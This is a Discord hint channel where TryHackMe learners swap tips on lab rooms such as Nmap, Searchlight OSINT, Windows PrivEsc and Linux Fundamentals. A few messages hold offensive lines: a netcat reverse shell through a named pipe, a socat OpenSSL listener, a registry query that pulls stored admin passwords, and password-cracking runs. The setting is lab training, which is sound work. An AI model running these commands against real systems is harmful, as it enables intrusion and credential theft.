#room-hints

1 messages Β· Page 73 of 1

versed bear
#

anybody else started the Searchlight - IMINT room and still looking for the coffee shop πŸ™‚

hexed crescent
oblique bloom
#

||any hints on "chill hack"? im on /secret/||

hexed crescent
blazing thorn
#

any hint on searchlightosint task 7 for the photographer's name?

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

blazing thorn
stuck fractal
#

Please wait 72 hours from release before asking.

blazing thorn
#

apologies

stuck fractal
#

Thank you

blazing thorn
#

I'll keep trucking at it πŸ‘

#

impatience

#

πŸ˜„

#

great room btw, thanks to @final stratus πŸ‘

final stratus
#

I'm glad you like it @blazing thorn!

blazing thorn
#

I recognised the restaurant immediately, that place is delicious!!!!

#

I've only been once, it was 8 years ago, but I remember it really well

blazing thorn
#

ugh, figured out photographer name πŸ™‚

#

twas a good one

white salmon
#

hello guys any hint to get flag1 in "linux strength training" ?

#

they are asking to use find command to find file with modified date 2016-09-12 in the workflow directory

glacial gust
#

if you look in the text, there is a row on it

white salmon
#

command used : fide workflow -type f -newermt "2016-09-12"

#

find*

ripe hedge
#

you'll want newer than yesterday and older than tomorrow to find today

white salmon
ripe hedge
#

πŸ˜‰

white salmon
#

oh got you

ripe hedge
#

good hunting

blazing thorn
#

@final stratus is there an error on task 8, question 1? feels like first word should be 5 characters πŸ€”

ripe hedge
#

naw, it's fine

blazing thorn
#

grrr

#

πŸ˜„

#

kk, ty ❀️

ripe hedge
#

more of an Anglophone reference though

blazing thorn
#

kk, tis the last one to get for the room

ripe hedge
#

hmm?

blazing thorn
#

I've solved all of the other tasks in that room

#

just task 8 Q1 to go

ripe hedge
#

ah ok

blazing thorn
#

got it πŸ™‚

#

all done, fantastic room

opaque remnant
#

Task 7 in What the Shell - I'm pretty sure I have the correct answer, but it won't accept. I've researched, found a walkthrough, checked and doublechecked. I'm suspecting it is a small typo or such? I'm using ||socat OPENSSL-LISTEN:53,cert=encrypt.pem,FILE:tty,raw,echo=0|| Any help appreciated - I hate leaving a room "incomplete" due to one lousy thing.

final stratus
#

well done @blazing thorn!

old lava
#

Can I have a hint for Overpass? I pulled exif data and I think I have a username but is this username in username@overpass.com or is it just 'username' ?

ripe hedge
#

are you on the login page?

#

Overpass 1 yes?

old lava
#

Yes

#

I was going to try an SQL injection to bypass login

ripe hedge
#

it's pretty dumb, look at how the thing actually works before breaking out the big guns

old lava
#

Alright, I'll re-examine

ripe hedge
#

the javascript might be helpful

#

Firefox has a dev console πŸ™‚

old lava
#

...oooooh...

#

I see what I need to do now

ripe hedge
#

πŸ™‚

old lava
#

I see now. Hello SSH.

ripe hedge
#

πŸ™‚

#

good hunting

#

the rest is really cute

#

I have to writeup part 2 one of these days

oblique bloom
#

can i have some help with chill hack? i cant get a shell

empty nacelle
#

Not every situation might be about getting a (reverse) shell. See what you can (and can't) do, then combine the steps to go deeper

cedar axle
#

@oblique bloom keep dir-bustering

white salmon
#

Where is the first place the computer will look to find the ip address of a domain ?

wintry yarrow
#

Is this related to room?

white salmon
#

yep

#

not sure if im in the right room as it did say "room-hints"

wintry yarrow
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
white salmon
#

Yikes!

#

I apologize! i tend not to grasp the most important rules 😦

mild eagle
#

@opaque remnant you are missing one small thing after pem

buoyant timber
#

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

#

Need help with that

#

Room is "what the shell"

cedar axle
#

@penny i think there is a bug with that

buoyant timber
#

written 15 variants

cedar axle
#

listener

buoyant timber
#

just cant get it working

cedar axle
#

its wrong but use listener

buoyant timber
#

pood can you dm me what you have in mind if you got the whole string?

#

So over this

cedar axle
#

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

#

count the stars

buoyant timber
#

50-60

#

πŸ˜‰

#

But I'll get it. Just wasting time

cedar axle
#

sure the one you posted before, replace the last comma with a space

#

i mean between pem and FILE

#

and use backticks

#

not single quotes

#

tty needs to be executed

buoyant timber
#

yeah I know Ok will try that

unique verge
#

Hi everyone

#

I'm stuck in this room, thought i could use some help

astral smelt
unique verge
remote gate
unique verge
#

i learned something valuable today...thanks @remote gate

remote gate
#

you’re welcome. don’t sweat it. it happens πŸ˜„

distant meadow
#

Each time you run the script, you have to check the EIP. The EIP can change each time.

ripe hedge
#

EIP being the instruction pointer?

oblique bloom
viscid osprey
#

SQLi task 7 am I missing something? I am following instructions correctly, I am getting an error, Unable to connect?

#

I am unable to connect, why is that? any suggestions, yes I am connected to my network

crimson sonnet
stuck fractal
#

It's not a linux command line

#

It's an smb command line

#

Exit out if it to cat the file.

crimson sonnet
#

O....ok

#

I knew it was simple ugh!

night fractal
oblique bloom
#

yours worked nice

#

thanks :)

fringe ibex
#

Anyone doing searchlight ? I'm stuck on 7th task one with reindeer bike

blazing thorn
#

!rule 13

#

boo

#

πŸ˜„

polar otter
#

||ig thats a hint saying to rephrase ||

opaque remnant
twin heron
#

hey is there anyone here who know how to use tmux plugins?

stuck fractal
#

Just ask your question directly

#

We don't know if we can help unless you ask directly

twin heron
#

LOL yeah umm I need to know how to use the plugin on tmux after I loaded it..

#

I cant find the answer any where

jaunty star
#

which plugin though?

stuck fractal
#

If not, don't ask here

twin heron
#

Its REmux The Tmux Task 6 last question

pseudo bobcat
#

Anybody tried the new "Searchlight - IMINT" ? How did you found the deer motorcycle picture? Tag if answer

abstract adder
#

Hi, I need help for Empire, for the next question:

What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?

final stratus
#

@pseudo bobcat use the hints 😁

night fractal
pseudo bobcat
white salmon
#

hi, any hint to Regular expressions room task 4 last Q ❀️ ?

oblique bloom
#

but the bash tcp reverse shell worked fine

night fractal
oblique bloom
#

just a traditional netcat reverse shell

night fractal
#

never really tried those tbh

oblique bloom
#

it was weird because it once i was able to make it connect

#

it wouldnt work

#

i was trying to figure it out

#

well next time ill jump straight to getting a reverse shell using other payloads

night fractal
#

my advice is if you can just straight get a revshell using bash you should do so

#

it's easy to use and it never broke down on me

oblique bloom
#

sure if it doesnt work id try another payload

#

but it connected so

#

i didnt know what was it about

night fractal
#

yeah, it is a bit weird

#

Imma try it when I get the chance

oblique bloom
#

||/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe||

#

i used a pipe on tmp

#

otherwise it wouldnt bind

oblique bloom
#

@night fractal uh ||mysql doesnt seem to respond to the password input||

#

maybe its the !

#

if i input it on the -p i think ! breaks it

#

maybe double quotes work on mysql?

#

hm even if im able to do it it still doesnt give a response

#

oh netcat shenanigans i bet

#

i spawned a shell with python and mysql works ok now

night fractal
#

sry it took me long, yeah, you just needed a better shell

blazing thorn
#

πŸ˜„

strong tapir
#

Hi everyone, I am trying the Wonderland series, but I am already stuck. I've already found the alice_door image and I saw that there was something written upside down, but I just can't read it. Any help would be appreciated

sonic wigeon
strong tapir
#

What do you mean?

sonic wigeon
#

Source of the web page

strong tapir
#

I looked at multiple write-ups if that's what you mean

sonic wigeon
#

I meant where you have found the alice_door image , look the source of that page

strong tapir
#

I was on a different challenge, but I've already solved it

vivid halo
#

Is there a mistake in the last question in this room? Can anyone help?

gusty turtle
vivid halo
#

vs3curepwd

gusty turtle
#

Yeah, the program is dependent on the file. You checked the de-compiler output? There is something happening with the string present in the secret.txtπŸ˜‰

umbral storm
#

hi! I have a question on "The Cod Caper" room, I just have a question left, it's about the ssh password of pingu, I read all the files belong to him, but I don't find it, I think is something with the id_rsa file, but I'm not sure, I can't decode it anyways, my question is, is that file or the password is a file in plain text?

stuck fractal
celest cipher
#

hey can i ask a question about the nmap room

#

ive looked everywhere for two hours

stuck fractal
#

Just ask

celest cipher
#

im at this stage and cant really figure out wtf

#

i did xmas scan with -vv and still cant seem to find the answer

#

unless im missing something

#

am i?

stuck fractal
#

Please don't show answrs

celest cipher
#

oof my bad

#

omg

#

found it

slow lantern
#

hi all
Windows PrivEsc v1.0
Nr 9.. - reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-> i should see the password of the admin in the registry but ... c'mon i cant see it ... looking for around 1h now ...
any hints?

#

got it uhh!

normal olive
#

hi, I have a question about madness..|| is the password for the second stego the same as the first one? ||

normal olive
#

got it, no worries.. damn, the name madness is appropriate

unique verge
#

Hello everyone

#

i'm doing the OWASP juice shop and i'm stuck

#

i did everything as asked about the third task but i'm not able to find the proper answer format, it's like the question is not clear enough

#

q#2 is similar but if if figure the right format i can submit for that question too

normal olive
# unique verge Question #1 Task 3

when I was doing that I remember missing a couple of the pop ups, maybe try again? or maybe you have an extra letter or space? there's no proper formatting, is just a long string a characters like in the second question

hushed snow
#

I was wondering if anyone could provide some help on a question that I am stuck on. It is the nmap room and I have put what I believe to be the correct script and searched online and confirmed but it keeps telling me that it is incorrect.

stuck fractal
#

@hushed snow Look at the answer format

#

It doesn't have a space

#

Check the manual

hushed snow
stuck fractal
#

Did you get it?

hushed snow
#

I haven't. I even have been reading the manual on the nmap website. I am putting --script"vuln" and nmap--script"vuln" and scriptvuln

stuck fractal
#

None of those are correct by any of the manual stuff

hushed snow
#

Ok I will keep searching

#

thank you

stuck fractal
#

||Replace the space with an =||

hushed snow
pure root
#

Hi, stuck at Windows privesc task 16. I really dont find the user privilege That is used for this exploit

broken urchin
#

Hello everyone,
I am doing Advent of Cyber
Day 13- Coal for Christmas

I have found the original source code for dirty cow and found how to compile it BUT when I try to compile and execute the code I get this error

simple mountain
broken urchin
broken urchin
#

I'll post it in advent (:

white salmon
#

Searchlight - IMINT, Task Β 7, Question 2, who took the cookie from the cookie jar...I mean, who took the photo ? No, seriously, who took it ? This task should have warning something like: "Scrolling and searching through social media sites could seriously impact your eyes" possibly also add "Risk of seizure due to mass flood of pictures" πŸ˜„

Well, all tasks solved, but this one. Needless to mention that I've gone through recommended links that the author posted,Β  checked visitoslo site, fb, instagram, tweeter, reversed image on to me known 8 different engines.... What am I missing besides a new set of eyes πŸ™‚

hollow maple
white salmon
#

all tasks solved, but this one

modest drift
#

i've found answer in visitoslo site

#

where it comes to this task

white salmon
stable gust
#

Hello ! I'm currently the Windows PrivEsc (task 9: Password - Registry) and I'm stuck because I can't find the password .
Could someone please direct me?
Thank you!

twin stratus
#

OK, Physical Security Intro, Task 6, Question 8...Im stuck like Chuck...ive watched soooo many videos and read sooooo many articles and its driving me mad. Any direction is appreciated.

coarse otter
#

hi pals . I need to know the MACHINE_IP (target machine)

#

I'm doing the nmap labo

#

what shoud I do to get the IP?

stuck fractal
#

@coarse otter Click deploy.

coarse otter
#

thk

frail heart
#

looking for help on the room IMINT on task 4. I got the building right, but the answers for the location (country and city) are somehow wrong...

gusty turtle
frail heart
#

nevermind, i just had to reload the page to make it work.

cedar axle
#

-lcrypt

#

oh its gone

red sandal
#

Hello need help for this room "NIS - Linux Part I" , i stuck in Task 1

#

some one can help me?

white salmon
#

Whats the problem

red sandal
white salmon
#

Re deploy the machine

red sandal
#

thank you

glass sedge
stuck fractal
#

...because that's the answer?

#

I don't know what you expect us to say

#

That's what the website says, so that's what the answer is

glass sedge
#

Can I DM someone to ask for help?

stuck fractal
#

Ideally ask in the help chats?

#

You're breaking rule 1 if you do it without getting permission first.

glass sedge
#

Am I allowed to share my incorrect attempts?

#

And what I looked for?

stuck fractal
#

Go onto the page for that CVE on that site

#

Copy and paste the exact text

tribal olive
#

Room: Source. I was looking for an exploit on msfconsole and every each of them requires a password to a webmin. Do I have to bruteforce the credentials?

median compass
tribal olive
#

I didn't expect that room would be so easy

median compass
#

it's a walkthrough room marked easy, keep trying boxes and you'll find one at the right level for you

tribal olive
#

I did SkyNet today and it's also marked as easy, but it took me like 2 hours to make it.

median compass
#

well there are only 3 levels, easy, medium & hard so each has to cover a range

#

difficulty is very subjective too, it's all about what you know and what you've practiced. Give it a month of trying every day and you'll probably root skynet in 10 mins

tribal olive
#

I think skynet room used to be medium one and now it's easy

#

Anyways, thank you @median compass for help

balmy wedge
#

Hey everyone, Room: Mitre Task 5 last question. I have read the page up and down, tried every possible varient and I am still stuck. I have been answering around the idea that it's something to do with ||virtualization and sandboxing|| but nothing like that seems to work

glacial gust
#

you are looking for programs, not methods

balmy wedge
#

got it, thanks. That one was sort of frustrating. Usually I come out think "Oh that makes sense." I don't like that one. lol

white salmon
#

hello guys, any hint about the last question in searchlight-imint room ?

white salmon
#

i found the place using google map 360 view but there is no name for the hotel

#

got it with hours of working

uneven inlet
#

anyone able to lend a hand on AoC2 day issue?

white salmon
stuck fractal
silk prairie
#

Hello family. I'm in the Nmap room. On task #15 Practical, there is question I totally don't understand. It goes like "there is a reason for -- what is it". Anyone give me a hint?

stuck fractal
#

Use very verbose mode

#

Make sure you're doing the correct scsn type

silk prairie
#

@stuck fractal thanks. But I'm not sure I understand the nature of the question. What am I even looking for?

stuck fractal
#

It'll literally say something like

#

1000 ports closed because of xyz

silk prairie
#

Oh I see. Let me try something quickly and come back to you. Thanks

#

@stuck fractal I got it thanks. It was right in front of my eyes all along. But I still think that the question wasn't correctly asked, it's very misleading.

stuck fractal
silk prairie
#

Well, it's my opinion. And to make it even worse, the characters in the answer field don't match the response. You gotta tweak it.

pine ridge
#

hi

#

does anyone have knowledge of king of hill here

stuck fractal
#

@pine ridge This channel is for hints with public THM rooms

#

You can try out Hackers and FoodCTF to get a taste for KoTH.

pine ridge
#

okay

brittle jay
#

|| What you have just done in the previous task? It can be used for the next task ||

serene iron
#

hi GUYS

#

I just joined THM and stuck at very first lab of Linux Fundamental 1

#

In task 9 called Binary Shiba1

night fractal
#

what's the problem you're facing?

#

@serene iron

serene iron
#

Hi mate, Thanks for your reply πŸ™‚

night fractal
#

yeah, no problem

#

did you get it in the meantime or are you still stuck?

serene iron
#

Nah still stuck.

#

So, it says to create noot.txt file which i do by using touch

#

touch noot.txt, it doesnt tells where to make to make it. So i just create the file in root directory.

#

then I cant understand the binary shiba1 part.

#

I dont want to search and see solution for it online and do it proper way. But dont know what to do after creating touch file

night fractal
#

ok

serene iron
#

yep.

night fractal
#

first of all, you should be making the file in the same directory where the binary is, aka the home directory of shiba1 (but I'm guessing that's what you were saying when talking about the 'root' directory 'cause I'm pretty sure that "/" is not world writeable)

#

and as for the binary part you just need to run it when the noot.txt file is present in the same directory and it'll give you the password for user shiba2

serene iron
#

yeah I make it in root directory and type ./Shiba1.

But then it says no such file

night fractal
#

here's a hint

serene iron
#

okay, So i need to move to shiba1 directory or create it if not present.

night fractal
#

be careful when typing stuff in linux terminal 'cause it is case sensitive

serene iron
#

but I dont htink they taught us how to create directory at this point. So wont have to create it.

night fractal
#

you also don't need to change any directories 'cause it's all in the home folder aka the folder you were connected to if my memory serves me right

serene iron
#

ah Han.

#

yes feels right. Thanks for your help.

night fractal
#

you're welcome

serene iron
#

sorry to bother you again. But I can't still get it. I'll send ss of what I've been doing

night fractal
#

pls do

#

helps a lot

serene iron
night fractal
#

that's an attackbox, something you can deploy if you don't have a good enough machine, or just don't wanna bother installing linux on a VM or your hardware

serene iron
#

Ah yes.

night fractal
#

basically a Kali VM given to you by tryhackme

serene iron
#

yes, thats correct. But still tahst pretty slow. I'm more comfortable in using Kali in VM.

night fractal
#

and the problem is that you didn't SSH into the box

serene iron
#

But doesnt show me option do download Kali VM.

serene iron
#

Oh yeah, okay.

night fractal
serene iron
#

yes, I did whatever were instructions they didnt tell to join through ssh. Do they?

night fractal
#

they actually did

#

in the very beginning

serene iron
#

Ah poor me. Sorry about that.

night fractal
#

it's all good, rookie mistakes

serene iron
#

Thanks alot for lettingme know @night fractal

night fractal
#

you're welcome πŸ˜„

serene iron
#

Ahh, they said logging through SSH is taught in Linux Fundamentals 2.

#

So, I thought I donot have to.

night fractal
#

to be fair, you didn't need to, tryhackme was kind enough to give you access to the box straight from the browser (just scroll all the way up)

#

but a lot of new people mistake deploying the attack box with deploying the machine

serene iron
#

you're sent by god to me. lol

night fractal
#

in a way that's true I guess

serene iron
#

Yes, exactly.

#

Hi @night fractal

#

Can you please tell me what means "How do you specify which shell is used when login"?

#

like to know if its shiba1 or shiba2?

night fractal
serene iron
#

okay.

night fractal
#

the question is related to the command you were reading about in that task, since you can login using your preffered shell

#

now do your best to find out how do you specify which shell do you want to use when switching users

serene iron
#

Yes. It is just first activity I'm doing for THM and aready roasted

#

But you helped me alot mate.

night fractal
#

it takes some time for things to get through to you so just keep going

serene iron
#

and I aslo realised how silly I'm.

empty nacelle
#

If that question is related to a room on tryhackme, please state the room name/task number when asking for help @subtle kindle
You'll probably get an answer quicker this way.

ripe hedge
#

Sounds like something Google would know

brisk moat
#

Room: NMAP

#

Task 3: Nmap Switches

#

Third to last question, its the only one I cant seem to find. (I know Im just blind or missing it) I tried googling and checked the nmap site, somehow Im not seeing it. What switch scans "all" ports?

eternal nexus
#

its in the documentation, just look carefully

brisk moat
#

hmmmm...I literally tried them all in the ports section. I'll look again...

eternal nexus
#

it's quite a small switch, but its in there

pine ridge
#

hi

#

i got doubts

#

so its like when i am doing a course or learning something

#

in that case i have to use the attackbox by tryhackme

#

like i wont be able to use my vm kali machine

#

if i use my kali machine for doing the very same thing .......then it wont work compared to the attckbox provided by tryhackme

stuck fractal
#

Then I suspect you're doing something wrong

pine ridge
#

for eg if i nmap a ip ..........i find results in the attckbox provided by tryhackme but not in my own kali box

#

nah i am not

stuck fractal
#

Connect to the VPN in Kali.

pine ridge
#

i can send u ss

#

what vpn

#

how

stuck fractal
pine ridge
stuck fractal
#

Asking for help and then arguing when you start getting help is counterproductive and rude

#

You need to connect to the TryHackMe VPN to access TryHackMe boxes from your own VM or machine

#

!vpn

proud scarabBOT
stuck fractal
#

You were told this in the welcome room

pine ridge
#

i did it but it dint work out really

#

will try doing it once again hold on

stuck fractal
pine ridge
#

how will i do that can u help

stuck fractal
#

10.0.0.0/8 (10.x.x.x) is private address space. You can't reach them over the internet.

stuck fractal
pine ridge
#

yea processing

#

what you are telling seems to be the solution @stuck fractal

stuck fractal
#

Yes.

pine ridge
#

but i am still getting error

#

prolly i am doing something wrong oof

stuck fractal
pine ridge
#

yea will meet there

bitter pecan
#

Hey, can anyone confirm something for me in VulnOSv2 RP Nessus task 4 q 9. I have found the web server and version number but it doesn't match up with the pattern in the answer. Does the VM have the same version as the expected answer? Also nmap'd the box and that gives the same version as nessus

bitter pecan
stuck fractal
#

The room is RP Nessus

#

Not VulnOSv2

bitter pecan
#

Ah, sorry. VulnOSv2 is the name of the box currently running. The one which is launched from rpnessus

#

Never mind. re-run the scan after resetting the box and it seems to have found the right version

empty pecan
#

@bitter pecan Would be interesting to know if you manage to enter the right plugin id in the first question of task 5.

#

as I am failing

runic gate
#

I'm in the Searchlight - IMINT room and think I found the location of the hotel (last exercise). The view matches the one in the video but I can't find a hotel name. I think the coordinates are || 1.2910883505810304, 103.84472325941232||

#

The first 3 words might be ||Hotel Novotel Signapore||, it matches the amount of leters : $

remote gate
runic gate
#

Sure : )

velvet kestrel
#

Guys need help in searchlight task7

blazing thorn
velvet kestrel
#

i think image took by "Tiberio Frascar"i

#

Location - Astrup Fearnley Museet

#

But both are incorrect

blazing thorn
#

please don't post answers in here

#

have you got the name of the statue?

velvet kestrel
#

No

blazing thorn
#

ok, find that first

#

that is the first domino to fall

zinc bronze
#

Is .RUN supposed to precede msfvenom payload when trying to gain shell in telnet sess? I’m stuck on exploiting

eager saffron
#

Yes

#

Try. RUN ping - c 1 your IP,
You shoud see if it worka for ya

stuck fractal
little sable
#

struggling a bit with day 12 of 25daysofchristmas. It seems the private key file is encrypted. I tried running johntheripper against it but it ends pretty quickly with no success. Maybe I got the syntax wrong? I would think it'd take more than 30 seconds to process all of rockyou

tribal olive
#

Room: Res. I logged onto the redis and I'm not really sure what to do next. Any hint?

visual jolt
#

lol this Redis room makes my head asplode

#

reminds me of memcached

little sable
stuck fractal
stuck fractal
#

It's not an SSH key but you seem to have treated it as such?

#

You're given the passphrases in the hints for the questions

little sable
#

well that's a lot of things I missed

#

it's not an ssh key?

stuck fractal
#

Day 12, correct?

little sable
#

no you nailed it

#

I don't know how to know what type of private key that was, and how I might have cracked the gpg pass

stuck fractal
#

It's a GPG key. You're given the passphrase for a reason

little sable
#

I completed it now, but I wonder if there was a way to do it without the hint

stuck fractal
#

No, if you look at the passphrase you're going to really struggle to crack that

little sable
#

fairenough

tribal olive
#

@stuck fractal I finished the room, the only problem was I didnt know how redis works

stuck fractal
#

Neither did I

#

I found a cool resource on it tho

#

Otherwise, it's awesome

#

More specifically, the redis RCE section

tribal olive
#

Oh I see you did the writeup on this room

#

let me see

stuck fractal
#

Wait was I the only writeup on it?

#

OOF

#

Ah cool there's more than one

visual jolt
#

@stuck fractal lol that's what ive been reading

#

for some reason i got stuck on the default web directory

#

the hint helped though

pure thistle
#

need help on HA Joker CTF room can anyone tell me what word list I'm suppose to use I'm on question 4

stuck fractal
#

@pure thistle Please don't ask the same question across multiple chats like that, it comes off as impatient and spammy

#

I have already answered your question.

pure thistle
#

nvm i found it it was the default ||common.txt|| had to peak at the write up to get the answer though

pine ridge
#

hi i am getting some error in metasploit where do i ask ?

stuck fractal
#

Read the channel topics and make a decision

pine ridge
#

ok

white salmon
acoustic steppe
white salmon
#

3rd task

acoustic steppe
#

U can enumerate it via nmap

white salmon
#

Yeah, I already have the vulnerability

cedar axle
#

@white salmon google it

white salmon
#

But I have search a lot but I can't find the CVE code

acoustic steppe
#

Then there will be some link of reference

cedar axle
#

if you have the exploit, what is the name of the exploit

white salmon
#

I don't have any exploit

cedar axle
white salmon
#

I already have the vulnerability, but I haven't the exploit

cedar axle
#

what is the vulnerability then?

white salmon
#

I think is ssh OpenSSH 7.2p2

#

On 2222 port

cedar axle
#

whar room is it?

acoustic steppe
white salmon
#

Thank you so much guys

cedar axle
#

what happens when you google OpenSSH 7.2p2

#

first result for me was

white salmon
#

Yeah, is a CVE, but is wrong

#

Can I send spoilers here?

acoustic steppe
#

Yeah

night fractal
#

surround them in double pipes if you really have to ||message||

cedar axle
#

theres another one further down from rapid7

white salmon
#

ok, but it is an image

white salmon
#

I didn't understand

night fractal
white salmon
cedar axle
#

the CVE i found is from 2019

#

its not ssh though

#

its something else

night fractal
#

first of all you're gonna need the full CVE code

white salmon
#

There are only 3 ports running

#

||21/tcp open ftp vsftpd 3.0.3
80/tcp closed http
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)||

cedar axle
#

check the web

white salmon
#

I found a .txt in ftp, but it's irrelevant

acoustic steppe
#

Have u visited the ip

white salmon
white salmon
acoustic steppe
#

What is the default page

white salmon
#

Apache2 Ubuntu Default Page

acoustic steppe
#

True maybe it is an vulnerable

white salmon
#

I will check

#

Thank you so much guys!

stuck fractal
#

@white salmon Please do not post answers

stark ravine
#

i'm new to tryhackme and i'm stuck in a question. I am doing the beginner learning path and I am stuck in the default credentials of the BFF site because I can't seem to figure out what the right username:password is. Could someone drop a hint?

potent kayak
#

hello , am new here

wintry ridge
#

Welcome!

stuck fractal
#

Hi. This channel is for asking for hints on tryhackme rooms. #general is there if you want to say hi @potent kayak

median compass
ionic gorge
#

Hi, everyone.
I got stuck on the last question of Intro to x86-64 room, please help me

stuck fractal
ionic gorge
#

Sorry, I'm new here

chilly bane
#

I just did the Reversing ELF room (https://tryhackme.com/room/reverselfiles)
For questions 7 & 8, if I ||modified the EIP to the giveFlag function|| would this be considered "cheating"? (it wasn't intended, by the looks of writeups)

thick niche
chilly bane
#

the binary will only check for the existence of the file so the contents of noot.txt won't matter

thick niche
#

when im doing ./shiba1.bin its says no such file or directory . what am i doing wrong

trim haven
#

remove .bin

#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
thick niche
#

still no such file or directory @trim haven

trim haven
#

Type ls and screenshout the output pls

thick niche
trim haven
#

You're doing it on the wrong machine

#

You're meant to do it on the machine you deploy in the room

#

not the attackbox :p

thick niche
#

oh ok lool thanx

#

yea thats totally make sense now

glossy jetty
#

i need help

#

on the first one

stuck fractal
#

That's vague

#

The first what?

glossy jetty
#

the very first question

stuck fractal
#

Google it?

#

Like seriously

#

Google it

glossy jetty
#

is it Vulnerability Assessor

stuck fractal
#

Try things and see

glossy jetty
#

does it say i got it right after?

stuck fractal
#

If you get it wrong, keep looking

stuck fractal
glossy jetty
#

this is drving me mad

#

idk what to do

stuck fractal
#

Keep googling

#

Research is 90% of hacking

glossy jetty
#

cyber security?

stuck fractal
#

@glossy jetty Enter the answer in the web page. Click Submit. If it's correct, you'll be told. If not, you'll also be told.

glossy jetty
#

yayayaya

stuck fractal
#

There's no penalty for wrong answers

glossy jetty
#

i got it

#

did u know i had it the whole time but i didnt click submit

stuck fractal
#

Do not post answers.

glossy jetty
#

ok sorry

lunar musk
glossy jetty
#

i got the next one right

lunar musk
#

Great

glossy jetty
#

i finished a room

lunar musk
#

You can do it

glossy jetty
#

now what

lunar musk
#

You can choose another one

glossy jetty
#

do i go dashboard

astral smelt
#

!docs free-path

proud scarabBOT
lunar musk
#

By topic or following a path

glossy jetty
#

i did following path

astral smelt
#

Click on that link and then do the rooms on there

lunar musk
#

This is an always learn experience

#

Never ends

glossy jetty
#

which is the best learning path

lunar musk
#

Always changing

astral smelt
#

The one I just linked as you're a beginner

lunar musk
glossy jetty
#

which one u did as a beginner

lunar musk
#

I started long before THM even existed, xd

#

It's easier now with THM

astral smelt
#

The beginner path also it's probably best to stop asking here as we're flooding the channel now

glossy jetty
#

there is no beginner path

astral smelt
#

The link I gave you

lunar musk
#

Later

glossy jetty
#

ok got it

lunar musk
#

I`m going to do some room now...

stuck fractal
#

If you ask for help, listen to what people say. It's ok to ask questions, don't argue with it.

#

Everyone here is a volunteer

glossy jetty
#

i cant lie this is driving me crazy

stuck fractal
#

What is?

#

@glossy jetty What is?

midnight swallow
#

any hint on user in daily bugle

median compass
#

what have you tried so far @midnight swallow?

midnight swallow
#

sudo -l, finding SUID bit, ran linpeas and it showed i could write to certain files but that didnt help, tried sshing in as the user with the password i have

#

i have a shell as apache

#

i tried to su to user with the password i have also

stuck fractal
#

Keep looking. The password is the right idea.

median compass
midnight swallow
#

ah nice

#

i found it

#

got root too that was pretty easy

#

can i ask you about how i got the shell as apache

median compass
#

with lots of rooms getting user is harder than root πŸ™‚

#

sure you can, dm?

midnight swallow
#

cool yeah

neon ridge
#

im on the Tutorial room, i fire the attackbox and and put in the ip on the thm page

#

i get a 405 error, is that supposed to happen?

stuck fractal
#

@neon ridge that's the wrong IP address

#

Click deploy

#

Use the IP under Active Machine Information

#

You used the IP of the attack box

neon ridge
#

Oh I didn't know there's a deploy box

neon ridge
tall rain
#

Hello guys, i have a question on https://tryhackme.com/room/linuxstrengthtraining Task 4 - 'Crack hashB.txt using john the ripper, what is the password?'

I have scp-ed the dict from remote machine to my local machine and use both john and hashcat to crach the hashB.txt but with no successful result on both tools. Here's my command:
john --format=raw-sha1 --wordlist=ww.mnf hashB.txt
with result:
Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 2 candidates left, minimum 8 needed for performance. 0g 0:00:00:00 DONE (2020-12-24 11:50) 0g/s 6039Kp/s 6039Kc/s 6039KC/s zythem..zythum Session completed
and hashcat:
sudo hashcat -m 100 hashB.txt ww.mnf
with result:
`Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA1
Hash.Target......: b7a875fc1ea228b9061041b7cec4bd3c52ab3ce3
Time.Started.....: Thu Dec 24 11:40:12 2020 (0 secs)
Time.Estimated...: Thu Dec 24 11:40:12 2020 (0 secs)
Guess.Base.......: File (ww.mnf)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2387.7 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 241562/241562 (100.00%)
Rejected.........: 0/241562 (0.00%)
Restore.Point....: 241562/241562 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: whirlgig -> zythum

Started: Thu Dec 24 11:40:08 2020
Stopped: Thu Dec 24 11:40:13 2020`
Any further hint or advice?

white salmon
#

your using the wrong wordlist for hashB

remote gate
#

πŸ‘† @tall rain try rockyou

tall rain
tall rain
white salmon
#

you're welcome

thick niche
#

My machine in this room https://tryhackme.com/room/linux2 doesnt show up it says it is activated but i dont see the Linux window show up . all other machine are shut down

thick niche
#

